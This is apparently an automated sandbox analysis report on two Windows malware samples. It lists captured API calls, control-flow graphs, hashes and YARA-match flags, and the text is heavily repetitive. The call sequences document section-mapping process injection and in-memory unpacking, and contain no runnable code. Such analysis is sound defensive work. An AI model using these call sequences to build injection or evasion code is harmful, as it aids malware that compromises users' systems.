                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                              • Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
                                                              • Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                              • Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                              • Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
                                                              • Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                              • Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02155E5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Offset: 02153000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2153000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 7ce8627ea71e6037c410e4caf55e12c421fa56827acf0e37ba6184a0b01d66b6
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: E2112879A40208EFDB01DF98C985E99BBF5EF08350F1580A4F9589B362D371EA90DF80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2110000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$GetProcAddress.$l
                                                              • API String ID: 0-2784972518
                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction ID: d486d75307bc883e2e3f020181736d47453b96a2fc3586c5d122d2491ae3b294
                                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                              • Instruction Fuzzy Hash: DD316CB6900609DFDB10CF99C880AAEBBF5FF48324F15405AD845AB314D771EA85CFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f1a99dda5f8a0a810f6dfd7ffcb20fb9386bb656a9bd30d63d74ae46b6effcca
                                                              • Instruction ID: ffc06cf009157061af95b141fb464433709802256663bfffc962ffdf4a1f9ae4
                                                              • Opcode Fuzzy Hash: f1a99dda5f8a0a810f6dfd7ffcb20fb9386bb656a9bd30d63d74ae46b6effcca
                                                              • Instruction Fuzzy Hash: 5651D0715296859FD713CF308CC5A967FADEF17301B0845BBD581AB5A3D3385A07838A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Offset: 02153000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2153000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction ID: 99131a953ea556830a5f1eff826f8f2d26a80a4c167bf61a4bfadc8b94965395
                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                              • Instruction Fuzzy Hash: 4C118272380111EFDB44DF55DCC0EA673EAFB88224B598095ED14CB311E775E801C760
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2110000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction ID: 7475680157ac40bf35106480223050aa579ca0c61c8a9dcb87d03faee0e78f5d
                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                              • Instruction Fuzzy Hash: 8101F272F516008FDF21CF20C804BAA33E5EB8A206F1540B8DD0A97285E370A8818B80
                                                              APIs
                                                              • UnhandledExceptionFilter.KERNEL32(00000000), ref: 0040BC59
                                                              • SetDefaultCommConfigA.KERNEL32(004230F0,?,00000000), ref: 0040BCAB
                                                              • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BCB5
                                                              • SleepEx.KERNEL32(00000000,00000000), ref: 0040BCBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418323999.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CalendarCommConfigDefaultExceptionFilterInfoSleepUnhandled
                                                              • String ID: -$d
                                                              • API String ID: 1714755991-1961052230
                                                              • Opcode ID: 767ce9f6e4b45859f0c898ce4a81191f8eb161bd46e591fa79638400a5444451
                                                              • Instruction ID: 611937db618160795b45420ca4b56ae8592046bfbc2aad96a730228e8614ca7d
                                                              • Opcode Fuzzy Hash: 767ce9f6e4b45859f0c898ce4a81191f8eb161bd46e591fa79638400a5444451
                                                              • Instruction Fuzzy Hash: 75119071D01228ABCB21DFA9ED859DFBFB8EF55714F10003AF105B6291CB344546CB99
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(01F6EC08), ref: 0040BB75
                                                              • GetProcAddress.KERNEL32(00000000,00427ED0), ref: 0040BBB2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418323999.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 1646373207-3916222277
                                                              • Opcode ID: f2f97dbd91ceef343cfa434ec76e2481c584c5966074daf8de3eed7171195444
                                                              • Instruction ID: 18c5cc9d400b96faee746cab7009418996affa1f81997e9bff723ab5a3e11860
                                                              • Opcode Fuzzy Hash: f2f97dbd91ceef343cfa434ec76e2481c584c5966074daf8de3eed7171195444
                                                              • Instruction Fuzzy Hash: CD31A03A66C7C4D8F321C7A4BD09B213B599B11B04F4184AAD550CB2BAD7FB0985C37E

                                                              Execution Graph

                                                              Execution Coverage:8.4%
                                                              Dynamic/Decrypted Code Coverage:17.6%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:165
                                                              Total number of Limit Nodes:7

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                              • Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
                                                              • Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                              • Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65

                                                              Control-flow Graph

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                              • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                              • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                              • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65

                                                              Control-flow Graph

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectView
                                                              • String ID:
                                                              • API String ID: 1652636561-0
                                                              • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                              • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                              • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                              • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24

                                                              Control-flow Graph

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 344 401620-401632 347 401643 344->347 348 401639-401670 call 4012a9 344->348 347->348 355 401672 348->355 356 401675-40167a 348->356 355->356 358 401680-401691 356->358 359 401991-401999 356->359 363 401697-4016c0 358->363 364 40198f 358->364 359->356 362 40199e-4019e0 call 4012a9 359->362 363->364 372 4016c6-4016dd NtDuplicateObject 363->372 364->362 372->364 374 4016e3-401707 NtCreateSection 372->374 376 401763-401789 NtCreateSection 374->376 377 401709-40172a NtMapViewOfSection 374->377 376->364 378 40178f-401793 376->378 377->376 380 40172c-401748 NtMapViewOfSection 377->380 378->364 381 401799-4017ba NtMapViewOfSection 378->381 380->376 383 40174a-401760 380->383 381->364 384 4017c0-4017dc NtMapViewOfSection 381->384 383->376 384->364 387 4017e2 call 4017e7 384->387
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 390 401658-401670 call 4012a9 394 401672 390->394 395 401675-40167a 390->395 394->395 397 401680-401691 395->397 398 401991-401999 395->398 402 401697-4016c0 397->402 403 40198f 397->403 398->395 401 40199e-4019e0 call 4012a9 398->401 402->403 411 4016c6-4016dd NtDuplicateObject 402->411 403->401 411->403 413 4016e3-401707 NtCreateSection 411->413 415 401763-401789 NtCreateSection 413->415 416 401709-40172a NtMapViewOfSection 413->416 415->403 417 40178f-401793 415->417 416->415 419 40172c-401748 NtMapViewOfSection 416->419 417->403 420 401799-4017ba NtMapViewOfSection 417->420 419->415 422 40174a-401760 419->422 420->403 423 4017c0-4017dc NtMapViewOfSection 420->423 422->415 423->403 426 4017e2 call 4017e7 423->426
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0

                                                              Control-flow Graph

                                                              APIs
                                                              • LocalReAlloc.KERNEL32(00000000,00000000,00000000), ref: 0040BDCF
                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 0040BDF4
                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 0040BE01
                                                              • InitAtomTable.KERNEL32(00000000), ref: 0040BE08
                                                              • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0040BE49
                                                              • ReadFileScatter.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0040BE6C
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040BE7B
                                                              • RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BE85
                                                              • RtlInterlockedPopEntrySList.NTDLL(?), ref: 0040BE9E
                                                              • FileTimeToSystemTime.KERNEL32(00000000,00000000), ref: 0040BEDB
                                                              • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BEE5
                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0040BEED
                                                              • GetFileAttributesW.KERNEL32(00423138), ref: 0040BEF8
                                                              • CompareStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0040BF0A
                                                              • ActivateActCtx.KERNEL32(00000000,00000000), ref: 0040BF12
                                                                • Part of subcall function 0040BA54: GetModuleHandleW.KERNEL32(0042310C,0040BF7A), ref: 0040BA59
                                                                • Part of subcall function 0040BA54: GetProcAddress.KERNEL32(00000000,00423128), ref: 0040BA65
                                                              • LoadLibraryA.KERNELBASE(004231E4), ref: 0040BFCC
                                                              • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0040C028
                                                              • GetProcessHeaps.KERNEL32(00000000,00000000), ref: 0040C046
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650003513.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: File$Time$ConsoleInterlockedModule$ActivateAddressAllocAtomAttributesCalendarCompareCriticalDeleteEntryEnumExceptionExchangeFormatsHandleHeapsInfoInitLibraryListLoadLocalModeNameOutputProcProcessRaiseReadScatterSectionStringSystemTableWrite
                                                              • String ID: k`$tl_$}$
                                                              • API String ID: 2790545399-211918992

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 54 20c003c-20c0047 55 20c004c-20c0263 call 20c0a3f call 20c0e0f call 20c0d90 VirtualAlloc 54->55 56 20c0049 54->56 71 20c028b-20c0292 55->71 72 20c0265-20c0289 call 20c0a69 55->72 56->55 74 20c02a1-20c02b0 71->74 76 20c02ce-20c03c2 VirtualProtect call 20c0cce call 20c0ce7 72->76 74->76 77 20c02b2-20c02cc 74->77 83 20c03d1-20c03e0 76->83 77->74 84 20c0439-20c04b8 VirtualFree 83->84 85 20c03e2-20c0437 call 20c0ce7 83->85 86 20c04be-20c04cd 84->86 87 20c05f4-20c05fe 84->87 85->83 89 20c04d3-20c04dd 86->89 90 20c077f-20c0789 87->90 91 20c0604-20c060d 87->91 89->87 94 20c04e3-20c0505 89->94 95 20c078b-20c07a3 90->95 96 20c07a6-20c07b0 90->96 91->90 97 20c0613-20c0637 91->97 105 20c0517-20c0520 94->105 106 20c0507-20c0515 94->106 95->96 98 20c086e-20c08be LoadLibraryA 96->98 99 20c07b6-20c07cb 96->99 100 20c063e-20c0648 97->100 104 20c08c7-20c08f9 98->104 102 20c07d2-20c07d5 99->102 100->90 103 20c064e-20c065a 100->103 107 20c0824-20c0833 102->107 108 20c07d7-20c07e0 102->108 103->90 109 20c0660-20c066a 103->109 110 20c08fb-20c0901 104->110 111 20c0902-20c091d 104->111 112 20c0526-20c0547 105->112 106->112 116 20c0839-20c083c 107->116 113 20c07e4-20c0822 108->113 114 20c07e2 108->114 115 20c067a-20c0689 109->115 110->111 117 20c054d-20c0550 112->117 113->102 114->107 118 20c068f-20c06b2 115->118 119 20c0750-20c077a 115->119 116->98 120 20c083e-20c0847 116->120 122 20c0556-20c056b 117->122 123 20c05e0-20c05ef 117->123 124 20c06ef-20c06fc 118->124 125 20c06b4-20c06ed 118->125 119->100 126 20c0849 120->126 127 20c084b-20c086c 120->127 130 20c056d 122->130 131 20c056f-20c057a 122->131 123->89 128 20c06fe-20c0748 124->128 129 20c074b 124->129 125->124 126->98 127->116 128->129 129->115 130->123 134 20c057c-20c0599 131->134 135 20c059b-20c05bb 131->135 138 20c05bd-20c05db 134->138 135->138 138->117
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 020C024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_20c0000_etrtabd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 429 22066ea-2206703 430 2206705-2206707 429->430 431 2206709 430->431 432 220670e-220671a CreateToolhelp32Snapshot 430->432 431->432 433 220672a-2206737 Module32First 432->433 434 220671c-2206722 432->434 435 2206740-2206748 433->435 436 2206739-220673a call 22063a9 433->436 434->433 441 2206724-2206728 434->441 439 220673f 436->439 439->435 441->430 441->433
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02206712
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02206732
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, Offset: 02203000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2203000_etrtabd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 442 40c05d-40c070 call 40bd58 444 40c075-40c079 442->444 445 40c082-40c089 444->445 446 40c0a6 445->446 447 40c08b-40c0a4 SetLastError GetConsoleAliasesA 445->447 446->446 447->445
                                                              APIs
                                                                • Part of subcall function 0040BD58: LocalReAlloc.KERNEL32(00000000,00000000,00000000), ref: 0040BDCF
                                                                • Part of subcall function 0040BD58: InterlockedExchange.KERNEL32(?,00000000), ref: 0040BDF4
                                                                • Part of subcall function 0040BD58: RtlDeleteCriticalSection.NTDLL(?), ref: 0040BE01
                                                                • Part of subcall function 0040BD58: InitAtomTable.KERNEL32(00000000), ref: 0040BE08
                                                                • Part of subcall function 0040BD58: WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0040BE49
                                                                • Part of subcall function 0040BD58: ReadFileScatter.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0040BE6C
                                                                • Part of subcall function 0040BD58: GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040BE7B
                                                                • Part of subcall function 0040BD58: RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BE85
                                                                • Part of subcall function 0040BD58: RtlInterlockedPopEntrySList.NTDLL(?), ref: 0040BE9E
                                                              • SetLastError.KERNEL32(00000000), ref: 0040C08D
                                                              • GetConsoleAliasesA.KERNEL32(?,00000000,00000000), ref: 0040C09E
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650003513.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: ConsoleFileInterlocked$AliasesAllocAtomCriticalDeleteEntryErrorExceptionExchangeInitLastListLocalModuleNameOutputRaiseReadScatterSectionTableWrite
                                                              • String ID:
                                                              • API String ID: 3667857532-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 449 20c0e0f-20c0e24 SetErrorMode * 2 450 20c0e2b-20c0e2c 449->450 451 20c0e26 449->451 451->450
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,020C0223,?,?), ref: 020C0E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,020C0223,?,?), ref: 020C0E1E
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_20c0000_etrtabd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 452 40ba8b-40baa8 VirtualProtect
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(00000040,?), ref: 0040BAA1
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1650003513.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_etrtabd.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 453 401a01-401a48 call 4012a9 Sleep call 401524 463 401a57-401aa7 call 4012a9 453->463 464 401a4a-401a52 call 401615 453->464 464->463
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1649944947.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
